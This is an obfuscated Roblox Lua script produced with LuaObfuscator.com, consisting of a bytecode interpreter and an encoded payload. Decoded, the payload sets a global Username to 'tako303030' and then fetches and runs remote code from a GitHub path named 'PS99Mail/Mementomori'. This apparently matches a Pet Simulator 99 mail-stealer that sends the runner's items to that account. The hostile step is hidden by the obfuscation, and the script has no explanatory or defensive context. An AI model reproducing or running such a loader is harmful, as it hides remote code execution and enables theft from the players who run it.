--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/(2^(v32-((1 + 0) -0))))%((4 -2)^(((v33-1) -(v32-((1497 -(282 + 595)) -(555 + 64)))) + (932 -(857 + (1711 -(1523 + 114)))))) ;return v83-(v83%1) ;end end else local v84=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0 + 0)) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (3 -0) );v19=v19 + (1069 -(68 + 997)) ;return (v37 * (16778486 -(226 + 1044))) + (v36 * ((279666 + 5704) -219834)) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v65=1435 -(729 + 706) ;while true do if (v65~=1) then else if (v38==(0 -0)) then local v97=0;while true do if (v97~=1) then else v41={};v42={v39,v40,nil,v41};v97=8 -6 ;end if (v97==(2 + 0)) then v38=2 -1 ;break;end if (v97==0) then v39={};v40={};v97=1414 -(447 + 966) ;end end end break;end if (v65==0) then local v91=0;while true do if (v91~=(0 -0)) then else if (v38~=(1819 -(1703 + 114))) then else local v98=701 -(376 + 325) ;while true do if (v98==(0 -0)) then for v144=2 -1 ,v24() do local v145=0;local v146;local v147;local v148;while true do if (v145==1) then v148=nil;while true do if (v146~=(1 + 0)) then else while true do if (v147~=(0 -0)) then else v148=v22();if (v21(v148,15 -(9 + 5) ,1)==0) then local v174=376 -(85 + 291) ;local v175;local v176;local v177;local v178;while true do if ((1265 -(243 + 1022))==v174) then v175=0 -0 ;v176=nil;v174=1;end if (v174==(1 + 0)) then local v179=1180 -(1123 + 57) ;while true do if (v179==(1 + 0)) then v174=256 -(163 + 91) ;break;end if (v179==(1930 -(1869 + 61))) then v177=nil;v178=nil;v179=1;end end end if (v174==(1 + 1)) then while true do if (v175~=(0 -0)) then else local v181=0 -0 ;while true do if (v181~=(0 + 0)) then else v176=v21(v148,2 -0 ,3);v177=v21(v148,4 + 0 ,6);v181=1;end if (v181==(1475 -(1329 + 145))) then v175=1;break;end end end if (v175==(973 -(140 + 831))) then local v182=1850 -(1409 + 441) ;local v183;while true do if (0==v182) then v183=0;while true do if (0~=v183) then else if (v21(v177,1,1)==(719 -(15 + 703))) then v178[2]=v44[v178[1 + 1 ]];end if (v21(v177,2,440 -(262 + 176) )~=(1722 -(345 + 1376))) then else v178[3]=v44[v178[3]];end v183=689 -(198 + 490) ;end if (v183==1) then v175=3;break;end end break;end end end if (v175==1) then v178={v23(),v23(),nil,nil};if (v176==(1206 -(696 + 510))) then local v185=0 -0 ;while true do if ((1262 -(1091 + 171))==v185) then v178[3]=v23();v178[1 + 3 ]=v23();break;end end elseif (v176==1) then v178[3]=v24();elseif (v176==2) then v178[3]=v24() -(2^16) ;elseif (v176==3) then local v196=0 -0 ;local v197;local v198;while true do if ((3 -2)==v196) then while true do if (v197~=0) then else v198=374 -(123 + 251) ;while true do if (v198==0) then v178[3]=v24() -(2^(79 -63)) ;v178[702 -(208 + 490) ]=v23();break;end end break;end end break;end if (v196==(0 + 0)) then local v199=0;while true do if (v199==1) then v196=1;break;end if (v199==(0 + 0)) then v197=0;v198=nil;v199=1;end end end end end v175=838 -(660 + 176) ;end if (v175==3) then if (v21(v177,3,1 + 2 )~=(203 -(14 + 188))) then else v178[4]=v44[v178[4]];end v39[v144]=v178;break;end end break;end end end break;end end break;end if (v146==0) then v147=0;v148=nil;v146=1;end end break;end if (v145==0) then v146=675 -(534 + 141) ;v147=nil;v145=1;end end end for v149=1,v24() do v40[v149-1 ]=v29();end v98=1;end if (v98~=1) then else return v42;end end end if (v38~=(1 + 0)) then else local v99=0 + 0 ;local v100;while true do if (0==v99) then v100=0;while true do if (v100~=0) then else v43=v24();v44={};v100=1;end if (v100~=(1 + 0)) then else for v166=1,v43 do local v167=0 -0 ;local v168;local v169;local v170;while true do if (v167~=1) then else v170=nil;while true do if (v168~=1) then else if (v169==(1 -0)) then v170=v22()~=(0 -0) ;elseif (v169==2) then v170=v25();elseif (v169==(2 + 1)) then v170=v26();end v44[v166]=v170;break;end if (v168~=(0 + 0)) then else local v172=396 -(115 + 281) ;local v173;while true do if (v172~=0) then else v173=0 -0 ;while true do if ((0 + 0)==v173) then local v180=0 -0 ;while true do if (v180~=0) then else v169=v22();v170=nil;v180=3 -2 ;end if (v180==(868 -(550 + 317))) then v173=1 -0 ;break;end end end if (v173~=1) then else v168=1 -0 ;break;end end break;end end end end break;end if (v167==(0 -0)) then v168=0;v169=nil;v167=286 -(134 + 151) ;end end end v42[3]=v22();v100=1667 -(970 + 695) ;end if (v100~=2) then else v38=2;break;end end break;end end end v91=1 -0 ;end if (v91~=(1991 -(582 + 1408))) then else v65=1;break;end end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=0 -0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v45==(2 -0)) then v50=v21(v47,21 + 0 ,(107 + 9) -85 );v51=((v21(v47,(707 + 1149) -(1195 + 629) )==(1501 -(1408 + 92))) and  -((1 + 0) -0)) or (242 -(187 + 54)) ;v45=5 -2 ;end if (v45==1) then v48=(2554 -(461 + 625)) -(263 + 636 + 144 + 424) ;v49=(v21(v47,1 + 0 ,48 -28 ) * ((782 -(162 + 618))^((1311 -(993 + 295)) + 9))) + v46 ;v45=2 + 0 ;end if (v45==(6 -3)) then if (v50==(0 -(0 + 0))) then if (v49==(0 + (1171 -(418 + 753)))) then return v51 * (1636 -(1373 + (792 -(406 + 123)))) ;else v50=(2770 -(1749 + 20)) -(451 + 549) ;v48=0 + 0 ;end elseif (v50==(118 + 1929)) then return ((v49==(1024 -(168 + 538 + 318))) and (v51 * ((1252 -(721 + 530))/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-(1719 -696) ) * (v48 + (v49/((1386 -(746 + 638))^(20 + 32)))) ;end if (v45==(0 -0)) then v46=v24();v47=v24();v45=701 -(271 + (1751 -(1249 + 73))) ;end end end v26=nil;function v26(v52)local v53;if  not v52 then local v85=0 + 0 ;while true do if (v85==(1145 -((2366 -(106 + 1794)) + 679))) then v52=v24();if (v52==(0 -0)) then return "";end break;end end end v53=v3(v16,v19,(v19 + v52) -(2 -1) );v19=v19 + v52 ;local v54={};for v66=1, #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=v1(v16,v19,v19);v19=v19 + 1 ;return v55;end v23=nil;function v23()local v56,v57=v1(v16,v19,v19 + 1 + 1 );v19=v19 + 1 + 1 ;return (v57 * (755 -499)) + v56 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v58)if (v1(v58,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v58,1,1));return "";end end else local v87=v2(v0(v58,16));if v20 then local v92=v5(v87,v20);v20=nil;return v92;else return v87;end end end);v18=1;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v101=v80[2];local v102,v103=v71(v78[v101](v13(v78,v101 + 1 ,v80[3])));v73=(v103 + v101) -1 ;local v104=0;for v114=v101,v73 do local v115=0;while true do if (v115==0) then v104=v104 + 1 ;v78[v114]=v102[v104];break;end end end elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=2) then v61[v80[3]]=v78[v80[2]];elseif (v81==3) then v78[v80[2]]=v80[3];else local v124=0;local v125;local v126;while true do if (v124==0) then v125=v80[2];v126=v78[v80[3]];v124=1;end if (v124==1) then v78[v125 + 1 ]=v126;v78[v125]=v126[v80[4]];break;end end end elseif (v81<=7) then if (v81<=5) then for v116=v80[2],v80[3] do v78[v116]=nil;end elseif (v81>6) then local v127=0;local v128;local v129;while true do if (v127==1) then v78[v128 + 1 ]=v129;v78[v128]=v129[v80[4]];break;end if (v127==0) then v128=v80[2];v129=v78[v80[3]];v127=1;end end else for v151=v80[2],v80[3] do v78[v151]=nil;end end elseif (v81<=8) then v78[v80[2]]=v80[3];elseif (v81==9) then v72=v80[3];else local v131=v80[2];v78[v131]=v78[v131](v13(v78,v131 + 1 ,v73));end elseif (v81<=15) then if (v81<=12) then if (v81==11) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end elseif (v81<=13) then v72=v80[3];elseif (v81>14) then v61[v80[3]]=v78[v80[2]];else v78[v80[2]]();end elseif (v81<=18) then if (v81<=16) then local v110=v80[2];local v111,v112=v71(v78[v110](v13(v78,v110 + 1 ,v80[3])));v73=(v112 + v110) -1 ;local v113=0;for v118=v110,v73 do v113=v113 + 1 ;v78[v118]=v111[v113];end elseif (v81==17) then v78[v80[2]]();else local v139=v80[2];v78[v139]=v78[v139](v13(v78,v139 + 1 ,v73));end elseif (v81<=19) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v61;else v78[v80[2]]=v61[v80[3]];end elseif (v81==20) then do return;end else do return;end end v72=v72 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D65030A3O0074616B6F333033303330030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012083O00014O0006000100013O0026013O00020001000100040D3O00020001001208000100013O002601000100050001000100040D3O00050001001208000200033O00120F000200023O00120C000200043O00120C000300053O002004000300030006001208000500076O000300054O000A00023O00022O000E00020001000100040D3O0014000100040D3O0005000100040D3O0014000100040D3O000200012O00153O00017O00",v9(),...);
